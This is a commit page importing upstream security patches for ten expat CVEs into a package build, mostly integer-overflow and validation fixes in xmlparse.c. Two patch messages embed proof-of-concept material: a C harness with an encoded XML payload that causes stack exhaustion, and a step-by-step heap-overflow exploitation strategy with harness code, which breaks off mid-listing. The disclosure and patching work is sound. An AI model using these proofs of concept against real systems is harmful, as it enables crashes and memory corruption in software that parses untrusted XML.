expat: import patches for CVEs

* import patches for CVEs from alpine 3.13

CVE-2021-45960, CVE-2021-46143, CVE-2022-22822, CVE-2022-23852, CVE-2022-23990
CVE-2022-25235, CVE-2022-25236, CVE-2022-25313, CVE-2022-25314, CVE-2022-25315

Signed-off-by: Michal Vasilek <michal.vasilek@nic.cz>
(cherry picked from commit 584c0c4378)
This commit is contained in:
Michal Vasilek 2022-02-23 21:34:58 +01:00 committed by Josef Schlehofer
parent 448eb6e4b9
commit 79db9a8e24
No known key found for this signature in database
GPG Key ID: B950216FE4329F4C
11 changed files with 866 additions and 2 deletions

View File

@ -7,9 +7,9 @@ include $(TOPDIR)/rules.mk
PKG_NAME:=expat
PKG_VERSION:=2.2.10
PKG_RELEASE:=1
PKG_RELEASE:=2
PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.xz
PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION)-RENAMED-VULNERABLE-PLEASE-USE-2.4.1-INSTEAD.tar.xz
PKG_SOURCE_URL:=@SF/expat
PKG_HASH:=5dfe538f8b5b63f03e98edac520d7d9a6a4d22e482e5c96d4d06fcc5485c25f2

View File

@ -0,0 +1,57 @@
From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Mon, 27 Dec 2021 20:15:02 +0100
Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
storeAtts (CVE-2021-45960)
---
expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
1 file changed, 29 insertions(+), 2 deletions(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -3240,7 +3240,13 @@ storeAtts(XML_Parser parser, const ENCOD
if (nPrefixes) {
int j; /* hash table index */
unsigned long version = parser->m_nsAttsVersion;
- int nsAttsSize = (int)1 << parser->m_nsAttsPower;
+
+ /* Detect and prevent invalid shift */
+ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
+ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
unsigned char oldNsAttsPower = parser->m_nsAttsPower;
/* size of hash table must be at least 2 * (# of prefixed attributes) */
if ((nPrefixes << 1)
@@ -3251,7 +3257,28 @@ storeAtts(XML_Parser parser, const ENCOD
;
if (parser->m_nsAttsPower < 3)
parser->m_nsAttsPower = 3;
- nsAttsSize = (int)1 << parser->m_nsAttsPower;
+
+ /* Detect and prevent invalid shift */
+ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
+ /* Restore actual size of memory in m_nsAtts */
+ parser->m_nsAttsPower = oldNsAttsPower;
+ return XML_ERROR_NO_MEMORY;
+ }
+
+ nsAttsSize = 1u << parser->m_nsAttsPower;
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
+ /* Restore actual size of memory in m_nsAtts */
+ parser->m_nsAttsPower = oldNsAttsPower;
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
nsAttsSize * sizeof(NS_ATT));
if (! temp) {

View File

@ -0,0 +1,41 @@
From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Sat, 25 Dec 2021 20:52:08 +0100
Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
doProlog (CVE-2021-46143)
---
expat/lib/xmlparse.c | 15 +++++++++++++++
1 file changed, 15 insertions(+)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -4803,6 +4803,11 @@ doProlog(XML_Parser parser, const ENCODI
if (parser->m_prologState.level >= parser->m_groupSize) {
if (parser->m_groupSize) {
{
+ /* Detect and prevent integer overflow */
+ if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
char *const new_connector = (char *)REALLOC(
parser, parser->m_groupConnector, parser->m_groupSize *= 2);
if (new_connector == NULL) {
@@ -4813,6 +4818,16 @@ doProlog(XML_Parser parser, const ENCODI
}
if (dtd->scaffIndex) {
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
int *const new_scaff_index = (int *)REALLOC(
parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
if (new_scaff_index == NULL)

View File

@ -0,0 +1,248 @@
From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Thu, 30 Dec 2021 22:46:03 +0100
Subject: [PATCH] lib: Prevent integer overflow at multiple places
(CVE-2022-22822 to CVE-2022-22827)
The involved functions are:
- addBinding (CVE-2022-22822)
- build_model (CVE-2022-22823)
- defineAttribute (CVE-2022-22824)
- lookup (CVE-2022-22825)
- nextScaffoldPart (CVE-2022-22826)
- storeAtts (CVE-2022-22827)
---
expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++-
1 file changed, 151 insertions(+), 2 deletions(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -3087,13 +3087,38 @@ storeAtts(XML_Parser parser, const ENCOD
/* get the attributes from the tokenizer */
n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts);
+
+ /* Detect and prevent integer overflow */
+ if (n > INT_MAX - nDefaultAtts) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
if (n + nDefaultAtts > parser->m_attsSize) {
int oldAttsSize = parser->m_attsSize;
ATTRIBUTE *temp;
#ifdef XML_ATTR_INFO
XML_AttrInfo *temp2;
#endif
+
+ /* Detect and prevent integer overflow */
+ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE)
+ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE;
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) {
+ parser->m_attsSize = oldAttsSize;
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts,
parser->m_attsSize * sizeof(ATTRIBUTE));
if (temp == NULL) {
@@ -3102,6 +3127,17 @@ storeAtts(XML_Parser parser, const ENCOD
}
parser->m_atts = temp;
#ifdef XML_ATTR_INFO
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+# if UINT_MAX >= SIZE_MAX
+ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) {
+ parser->m_attsSize = oldAttsSize;
+ return XML_ERROR_NO_MEMORY;
+ }
+# endif
+
temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo,
parser->m_attsSize * sizeof(XML_AttrInfo));
if (temp2 == NULL) {
@@ -3436,9 +3472,31 @@ storeAtts(XML_Parser parser, const ENCOD
tagNamePtr->prefixLen = prefixLen;
for (i = 0; localPart[i++];)
; /* i includes null terminator */
+
+ /* Detect and prevent integer overflow */
+ if (binding->uriLen > INT_MAX - prefixLen
+ || i > INT_MAX - (binding->uriLen + prefixLen)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
n = i + binding->uriLen + prefixLen;
if (n > binding->uriAlloc) {
TAG *p;
+
+ /* Detect and prevent integer overflow */
+ if (n > INT_MAX - EXPAND_SPARE) {
+ return XML_ERROR_NO_MEMORY;
+ }
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char));
if (! uri)
return XML_ERROR_NO_MEMORY;
@@ -3534,6 +3592,21 @@ addBinding(XML_Parser parser, PREFIX *pr
if (parser->m_freeBindingList) {
b = parser->m_freeBindingList;
if (len > b->uriAlloc) {
+ /* Detect and prevent integer overflow */
+ if (len > INT_MAX - EXPAND_SPARE) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
XML_Char *temp = (XML_Char *)REALLOC(
parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE));
if (temp == NULL)
@@ -3546,6 +3619,21 @@ addBinding(XML_Parser parser, PREFIX *pr
b = (BINDING *)MALLOC(parser, sizeof(BINDING));
if (! b)
return XML_ERROR_NO_MEMORY;
+
+ /* Detect and prevent integer overflow */
+ if (len > INT_MAX - EXPAND_SPARE) {
+ return XML_ERROR_NO_MEMORY;
+ }
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
+ return XML_ERROR_NO_MEMORY;
+ }
+#endif
+
b->uri
= (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE));
if (! b->uri) {
@@ -5826,7 +5914,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTR
}
} else {
DEFAULT_ATTRIBUTE *temp;
+
+ /* Detect and prevent integer overflow */
+ if (type->allocDefaultAtts > INT_MAX / 2) {
+ return 0;
+ }
+
int count = type->allocDefaultAtts * 2;
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) {
+ return 0;
+ }
+#endif
+
temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts,
(count * sizeof(DEFAULT_ATTRIBUTE)));
if (temp == NULL)
@@ -6477,8 +6582,20 @@ lookup(XML_Parser parser, HASH_TABLE *ta
/* check for overflow (table is half full) */
if (table->used >> (table->power - 1)) {
unsigned char newPower = table->power + 1;
+
+ /* Detect and prevent invalid shift */
+ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) {
+ return NULL;
+ }
+
size_t newSize = (size_t)1 << newPower;
unsigned long newMask = (unsigned long)newSize - 1;
+
+ /* Detect and prevent integer overflow */
+ if (newSize > (size_t)(-1) / sizeof(NAMED *)) {
+ return NULL;
+ }
+
size_t tsize = newSize * sizeof(NAMED *);
NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize);
if (! newV)
@@ -6828,6 +6945,20 @@ nextScaffoldPart(XML_Parser parser) {
if (dtd->scaffCount >= dtd->scaffSize) {
CONTENT_SCAFFOLD *temp;
if (dtd->scaffold) {
+ /* Detect and prevent integer overflow */
+ if (dtd->scaffSize > UINT_MAX / 2u) {
+ return -1;
+ }
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) {
+ return -1;
+ }
+#endif
+
temp = (CONTENT_SCAFFOLD *)REALLOC(
parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD));
if (temp == NULL)
@@ -6897,8 +7028,26 @@ build_model(XML_Parser parser) {
XML_Content *ret;
XML_Content *cpos;
XML_Char *str;
- int allocsize = (dtd->scaffCount * sizeof(XML_Content)
- + (dtd->contentStringLen * sizeof(XML_Char)));
+
+ /* Detect and prevent integer overflow.
+ * The preprocessor guard addresses the "always false" warning
+ * from -Wtype-limits on platforms where
+ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
+#if UINT_MAX >= SIZE_MAX
+ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) {
+ return NULL;
+ }
+ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) {
+ return NULL;
+ }
+#endif
+ if (dtd->scaffCount * sizeof(XML_Content)
+ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) {
+ return NULL;
+ }
+
+ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content)
+ + (dtd->contentStringLen * sizeof(XML_Char)));
ret = (XML_Content *)MALLOC(parser, allocsize);
if (! ret)

View File

@ -0,0 +1,25 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40
From 847a645152f5ebc10ac63b74b604d0c1a79fae40 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Sat, 22 Jan 2022 17:48:00 +0100
Subject: [PATCH] lib: Detect and prevent integer overflow in XML_GetBuffer
(CVE-2022-23852)
---
expat/lib/xmlparse.c | 5 +++++
1 file changed, 5 insertions(+)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -1971,6 +1971,11 @@ XML_GetBuffer(XML_Parser parser, int len
keep = (int)EXPAT_SAFE_PTR_DIFF(parser->m_bufferPtr, parser->m_buffer);
if (keep > XML_CONTEXT_BYTES)
keep = XML_CONTEXT_BYTES;
+ /* Detect and prevent integer overflow */
+ if (keep > INT_MAX - neededSize) {
+ parser->m_errorCode = XML_ERROR_NO_MEMORY;
+ return NULL;
+ }
neededSize += keep;
#endif /* defined XML_CONTEXT_BYTES */
if (neededSize

View File

@ -0,0 +1,40 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/ede41d1e186ed2aba88a06e84cac839b770af3a1
From ede41d1e186ed2aba88a06e84cac839b770af3a1 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Wed, 26 Jan 2022 02:36:43 +0100
Subject: [PATCH] lib: Prevent integer overflow in doProlog (CVE-2022-23990)
The change from "int nameLen" to "size_t nameLen"
addresses the overflow on "nameLen++" in code
"for (; name[nameLen++];)" right above the second
change in the patch.
---
expat/lib/xmlparse.c | 10 ++++++++--
1 file changed, 8 insertions(+), 2 deletions(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -5126,7 +5126,7 @@ doProlog(XML_Parser parser, const ENCODI
if (dtd->in_eldecl) {
ELEMENT_TYPE *el;
const XML_Char *name;
- int nameLen;
+ size_t nameLen;
const char *nxt
= (quant == XML_CQUANT_NONE ? next : next - enc->minBytesPerChar);
int myindex = nextScaffoldPart(parser);
@@ -5142,7 +5142,13 @@ doProlog(XML_Parser parser, const ENCODI
nameLen = 0;
for (; name[nameLen++];)
;
- dtd->contentStringLen += nameLen;
+
+ /* Detect and prevent integer overflow */
+ if (nameLen > UINT_MAX - dtd->contentStringLen) {
+ return XML_ERROR_NO_MEMORY;
+ }
+
+ dtd->contentStringLen += (unsigned)nameLen;
if (parser->m_elementDeclHandler)
handleDefault = XML_FALSE;
}

View File

@ -0,0 +1,41 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6
From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Tue, 8 Feb 2022 04:32:20 +0100
Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
---
expat/lib/xmltok_impl.c | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
--- a/lib/xmltok_impl.c
+++ b/lib/xmltok_impl.c
@@ -61,7 +61,7 @@
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
- if (! IS_NAME_CHAR(enc, ptr, n)) { \
+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) { \
*nextTokPtr = ptr; \
return XML_TOK_INVALID; \
} \
@@ -90,7 +90,7 @@
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
- if (! IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) { \
*nextTokPtr = ptr; \
return XML_TOK_INVALID; \
} \
@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, c
case BT_LEAD##n: \
if (end - ptr < n) \
return XML_TOK_PARTIAL_CHAR; \
+ if (IS_INVALID_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
if (IS_NMSTRT_CHAR(enc, ptr, n)) { \
ptr += n; \
tok = XML_TOK_NAME; \

View File

@ -0,0 +1,31 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/a2fe525e660badd64b6c557c2b1ec26ddc07f6e4
From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
From: Sebastian Pipping <sebastian@pipping.org>
Date: Sat, 12 Feb 2022 01:09:29 +0100
Subject: [PATCH] lib: Protect against malicious namespace declarations
(CVE-2022-25236)
---
expat/lib/xmlparse.c | 11 +++++++++++
1 file changed, 11 insertions(+)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -3581,6 +3581,17 @@ addBinding(XML_Parser parser, PREFIX *pr
if (! mustBeXML && isXMLNS
&& (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
isXMLNS = XML_FALSE;
+
+ // NOTE: While Expat does not validate namespace URIs against RFC 3986,
+ // we have to at least make sure that the XML processor on top of
+ // Expat (that is splitting tag names by namespace separator into
+ // 2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
+ // by an attacker putting additional namespace separator characters
+ // into namespace declarations. That would be ambiguous and not to
+ // be expected.
+ if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
+ return XML_ERROR_SYNTAX;
+ }
}
isXML = isXML && len == xmlLen;
isXMLNS = isXMLNS && len == xmlnsLen;

View File

@ -0,0 +1,221 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/bbdfcfef4747d2d66e81c19f4a55e29e291aa171
From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:54:29 +0000
Subject: [PATCH] Prevent stack exhaustion in build_model
It is possible to trigger stack exhaustion in build_model function if
depth of nested children in DTD element is large enough. This happens
because build_node is a recursively called function within build_model.
The code has been adjusted to run iteratively. It uses the already
allocated heap space as temporary stack (growing from top to bottom).
Output is identical to recursive version. No new fields in data
structures were added, i.e. it keeps full API and ABI compatibility.
Instead the numchildren variable is used to temporarily keep the
index of items (uint vs int).
Documentation and readability improvements kindly added by Sebastian.
Proof of Concept:
1. Compile poc binary which parses XML file line by line
```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdio.h>
XML_Parser parser;
static void XMLCALL
dummy_element_decl_handler(void *userData, const XML_Char *name,
XML_Content *model) {
XML_FreeContentModel(parser, model);
}
int main(int argc, char *argv[]) {
FILE *fp;
char *p = NULL;
size_t s = 0;
ssize_t l;
if (argc != 2)
errx(1, "usage: poc poc.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "XML_ParserCreate");
XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
if ((fp = fopen(argv[1], "r")) == NULL)
err(1, "fopen");
while ((l = getline(&p, &s, fp)) > 0)
if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
errx(1, "XML_Parse");
XML_ParserFree(parser);
free(p);
fclose(fp);
return 0;
}
EOF
cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
```
2. Create XML file with a lot of nested groups in DTD element
```
cat > poc.xml.zst.b64 << EOF
KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
EOF
base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
```
3. Run Proof of Concept
```
./poc poc.xml
```
Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
---
expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
1 file changed, 79 insertions(+), 37 deletions(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -7012,44 +7012,15 @@ nextScaffoldPart(XML_Parser parser) {
return next;
}
-static void
-build_node(XML_Parser parser, int src_node, XML_Content *dest,
- XML_Content **contpos, XML_Char **strpos) {
- DTD *const dtd = parser->m_dtd; /* save one level of indirection */
- dest->type = dtd->scaffold[src_node].type;
- dest->quant = dtd->scaffold[src_node].quant;
- if (dest->type == XML_CTYPE_NAME) {
- const XML_Char *src;
- dest->name = *strpos;
- src = dtd->scaffold[src_node].name;
- for (;;) {
- *(*strpos)++ = *src;
- if (! *src)
- break;
- src++;
- }
- dest->numchildren = 0;
- dest->children = NULL;
- } else {
- unsigned int i;
- int cn;
- dest->numchildren = dtd->scaffold[src_node].childcnt;
- dest->children = *contpos;
- *contpos += dest->numchildren;
- for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
- i++, cn = dtd->scaffold[cn].nextsib) {
- build_node(parser, cn, &(dest->children[i]), contpos, strpos);
- }
- dest->name = NULL;
- }
-}
-
static XML_Content *
build_model(XML_Parser parser) {
+ /* Function build_model transforms the existing parser->m_dtd->scaffold
+ * array of CONTENT_SCAFFOLD tree nodes into a new array of
+ * XML_Content tree nodes followed by a gapless list of zero-terminated
+ * strings. */
DTD *const dtd = parser->m_dtd; /* save one level of indirection */
XML_Content *ret;
- XML_Content *cpos;
- XML_Char *str;
+ XML_Char *str; /* the current string writing location */
/* Detect and prevent integer overflow.
* The preprocessor guard addresses the "always false" warning
@@ -7075,10 +7046,81 @@ build_model(XML_Parser parser) {
if (! ret)
return NULL;
- str = (XML_Char *)(&ret[dtd->scaffCount]);
- cpos = &ret[1];
+ /* What follows is an iterative implementation (of what was previously done
+ * recursively in a dedicated function called "build_node". The old recursive
+ * build_node could be forced into stack exhaustion from input as small as a
+ * few megabyte, and so that was a security issue. Hence, a function call
+ * stack is avoided now by resolving recursion.)
+ *
+ * The iterative approach works as follows:
+ *
+ * - We use space in the target array for building a temporary stack structure
+ * while that space is still unused.
+ * The stack grows from the array's end downwards and the "actual data"
+ * grows from the start upwards, sequentially.
+ * (Because stack grows downwards, pushing onto the stack is a decrement
+ * while popping off the stack is an increment.)
+ *
+ * - A stack element appears as a regular XML_Content node on the outside,
+ * but only uses a single field -- numchildren -- to store the source
+ * tree node array index. These are the breadcrumbs leading the way back
+ * during pre-order (node first) depth-first traversal.
+ *
+ * - The reason we know the stack will never grow into (or overlap with)
+ * the area with data of value at the start of the array is because
+ * the overall number of elements to process matches the size of the array,
+ * and the sum of fully processed nodes and yet-to-be processed nodes
+ * on the stack, cannot be more than the total number of nodes.
+ * It is possible for the top of the stack and the about-to-write node
+ * to meet, but that is safe because we get the source index out
+ * before doing any writes on that node.
+ */
+ XML_Content *dest = ret; /* tree node writing location, moves upwards */
+ XML_Content *const destLimit = &ret[dtd->scaffCount];
+ XML_Content *const stackBottom = &ret[dtd->scaffCount];
+ XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
+ str = (XML_Char *)&ret[dtd->scaffCount];
+
+ /* Push source tree root node index onto the stack */
+ (--stackTop)->numchildren = 0;
+
+ for (; dest < destLimit; dest++) {
+ /* Pop source tree node index off the stack */
+ const int src_node = (int)(stackTop++)->numchildren;
+
+ /* Convert item */
+ dest->type = dtd->scaffold[src_node].type;
+ dest->quant = dtd->scaffold[src_node].quant;
+ if (dest->type == XML_CTYPE_NAME) {
+ const XML_Char *src;
+ dest->name = str;
+ src = dtd->scaffold[src_node].name;
+ for (;;) {
+ *str++ = *src;
+ if (! *src)
+ break;
+ src++;
+ }
+ dest->numchildren = 0;
+ dest->children = NULL;
+ } else {
+ unsigned int i;
+ int cn;
+ dest->name = NULL;
+ dest->numchildren = dtd->scaffold[src_node].childcnt;
+ dest->children = &dest[1];
+
+ /* Push children to the stack
+ * in a way where the first child ends up at the top of the
+ * (downwards growing) stack, in order to be processed first. */
+ stackTop -= dest->numchildren;
+ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
+ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
+ (stackTop + i)->numchildren = (unsigned int)cn;
+ }
+ }
+ }
- build_node(parser, 0, ret, &cpos, &str);
return ret;
}

View File

@ -0,0 +1,23 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/d477fdd284468f2ab822024e75702f2c1b254f42
From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:56:57 +0000
Subject: [PATCH] Prevent integer overflow in copyString
The copyString function is only used for encoding string supplied by
the library user.
---
expat/lib/xmlparse.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -7149,7 +7149,7 @@ getElementType(XML_Parser parser, const
static XML_Char *
copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
- int charsRequired = 0;
+ size_t charsRequired = 0;
XML_Char *result;
/* First determine how long the string is */

View File

@ -0,0 +1,137 @@
Patch-Source: https://github.com/libexpat/libexpat/commit/89214940efd13e3b83fa078fd70eb4dbdc04c4a5
From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:55:46 +0000
Subject: [PATCH] Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.
The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.
Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.
Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.
The proof of concept works by taking these three considerations into
account:
1. Move the m_buffer size slightly below a power of two by having a
short root node <a>. This allows the m_buffer to grow very close
to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
which only contains ASCII characters. UTF-16 always stores two
bytes per character while the tag name is converted to using only
one. Our attack node byte count must be a bit higher than
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
in sum can overflow INT_MAX.
Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.
Proof of Concept:
1. Compile expat with -fsanitize=address.
2. Create Proof of Concept binary which iterates through input
file 16 MB at once for better performance and easier integer
calculations:
```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdlib.h>
#include <stdio.h>
#define CHUNK (16 * 1024 * 1024)
int main(int argc, char *argv[]) {
XML_Parser parser;
FILE *fp;
char *buf;
int i;
if (argc != 2)
errx(1, "usage: poc file.xml");
if ((parser = XML_ParserCreate(NULL)) == NULL)
errx(1, "failed to create expat parser");
if ((fp = fopen(argv[1], "r")) == NULL) {
XML_ParserFree(parser);
err(1, "failed to open file");
}
if ((buf = malloc(CHUNK)) == NULL) {
fclose(fp);
XML_ParserFree(parser);
err(1, "failed to allocate buffer");
}
i = 0;
while (fread(buf, CHUNK, 1, fp) == 1) {
